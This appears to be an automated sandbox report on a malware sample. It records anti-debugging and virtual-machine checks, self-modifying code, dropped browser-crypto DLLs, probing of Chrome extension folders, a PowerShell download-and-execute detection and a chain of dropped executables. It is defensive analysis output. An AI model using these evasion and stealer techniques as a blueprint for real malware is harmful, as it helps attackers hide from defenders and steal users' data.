Source: C:\Users\user\DocumentsKECFIDGCBF.exe	RDTSC instruction interceptor: First address: A51A58 second address: A51A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F70146AC615h 0x00000008 jmp 00007F70146AC60Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E5F75A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FF3834 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FF1FE1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FFDF1B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E5F72B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1082E68 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Special instruction interceptor: First address: 88EA5D instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Special instruction interceptor: First address: A2B3CF instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Special instruction interceptor: First address: A29D79 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Special instruction interceptor: First address: A299F3 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Special instruction interceptor: First address: ABFC18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A5EA5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: BFB3CF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: BF9D79 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: BF99F3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: C8FC18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Special instruction interceptor: First address: 12048DD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Special instruction interceptor: First address: 13D7BAF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Special instruction interceptor: First address: C1CBAF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Special instruction interceptor: First address: DBE570 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Special instruction interceptor: First address: DE27E3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Special instruction interceptor: First address: C1CAA8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Special instruction interceptor: First address: E41459 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Special instruction interceptor: First address: 105F75A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Special instruction interceptor: First address: 11F3834 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Special instruction interceptor: First address: 11F1FE1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Special instruction interceptor: First address: 11FDF1B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Special instruction interceptor: First address: 105F72B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Special instruction interceptor: First address: 1282E68 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Special instruction interceptor: First address: 70DC60 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Special instruction interceptor: First address: 94FF31 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Special instruction interceptor: First address: 712A3E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Special instruction interceptor: First address: 66FDC60 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Special instruction interceptor: First address: 693FF31 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Special instruction interceptor: First address: 6702A3E instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Memory allocated: 4BC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Memory allocated: 4E20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Memory allocated: 4BC0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\DocumentsKECFIDGCBF.exe

Code function: 9_2_051F0733 rdtsc

9_2_051F0733

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 7588	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7584	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7684	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7576	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7940	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7940	Thread sleep time: -130065s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7928	Thread sleep count: 63 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7928	Thread sleep time: -126063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892	Thread sleep count: 306 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892	Thread sleep time: -9180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7904	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7904	Thread sleep time: -130065s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7840	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7840	Thread sleep time: -86043s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7908	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7932	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7932	Thread sleep time: -104052s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe TID: 2304	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe TID: 2424	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe TID: 2260	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe TID: 4476	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe TID: 8044	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe TID: 2720	Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe TID: 5652	Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe TID: 7208	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe TID: 600	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe TID: 3888	Thread sleep time: -150000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\DocumentsKECFIDGCBF.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C56EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6C56EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: skotes.exe, skotes.exe, 0000000B.00000002.3082237036.0000000000BDB000.00000040.00000001.01000000.0000000D.sdmp, aedbd2e320.exe, 0000000F.00000002.2739870115.00000000011D7000.00000040.00000001.01000000.00000010.sdmp, 0718eb7837.exe, 00000010.00000002.3082015479.0000000000D9F000.00000040.00000001.01000000.0000000F.sdmp, aedbd2e320.exe, 00000020.00000002.2913543799.00000000011D7000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2129788119.0000000000796000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: file.exe, 00000000.00000002.2154371815.0000000023462000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8-
Source: firefox.exe, 0000001F.00000002.2897862516.0000023BA050A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWiVKY
Source: firefox.exe, 0000001F.00000002.2903715752.0000023BA0D40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW&!
Source: firefox.exe, 0000001F.00000002.2903715752.0000023BA0D40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle.
Source: firefox.exe, 00000021.00000002.2897094701.000001396603A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWZ
Source: firefox.exe, 00000021.00000002.2901769401.000001396681F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
Source: skotes.exe, 0000000B.00000002.3095371206.00000000014DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: firefox.exe, 00000031.00000002.3159881754.0000024F65CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: firefox.exe, 0000001F.00000002.2897862516.0000023BA050A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW S
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.3095371206.000000000150B000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 0000000F.00000002.2743981437.0000000001686000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 0000000F.00000002.2743981437.00000000016B5000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3094604903.000000000165E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3094604903.000000000162F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2903715752.0000023BA0D40000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B17000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2901769401.0000013966810000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3159881754.0000024F65CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: firefox.exe, 0000001F.00000002.2903045103.0000023BA0918000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3256156843.0000024F6FC95000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarev
Source: firefox.exe, 0000001F.00000002.2897862516.0000023BA050A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: file.exe, 00000000.00000002.2130744682.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, DocumentsKECFIDGCBF.exe, 00000009.00000002.2158417152.0000000000A0B000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2193747572.0000000000BDB000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000B.00000002.3082237036.0000000000BDB000.00000040.00000001.01000000.0000000D.sdmp, aedbd2e320.exe, 0000000F.00000002.2739870115.00000000011D7000.00000040.00000001.01000000.00000010.sdmp, 0718eb7837.exe, 00000010.00000002.3082015479.0000000000D9F000.00000040.00000001.01000000.0000000F.sdmp, aedbd2e320.exe, 00000020.00000002.2913543799.00000000011D7000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: firefox.exe, 0000001F.00000002.2903715752.0000023BA0D40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2901769401.000001396681F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2904900941.000001F1EE99D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process queried: DebugPort

Source: C:\Users\user\DocumentsKECFIDGCBF.exe

Code function: 9_2_051F0733 rdtsc

9_2_051F0733

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C63AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C63AC62

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00A2652B mov eax, dword ptr fs:[00000030h]		11_2_00A2652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00A2A302 mov eax, dword ptr fs:[00000030h]		11_2_00A2A302

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C63AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C63AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 7540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aedbd2e320.exe PID: 5956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aedbd2e320.exe PID: 6520, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECFIDGCBF.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsKECFIDGCBF.exe "C:\Users\user\DocumentsKECFIDGCBF.exe"	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe "C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe "C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe "C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe "C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe"	Jump to behavior
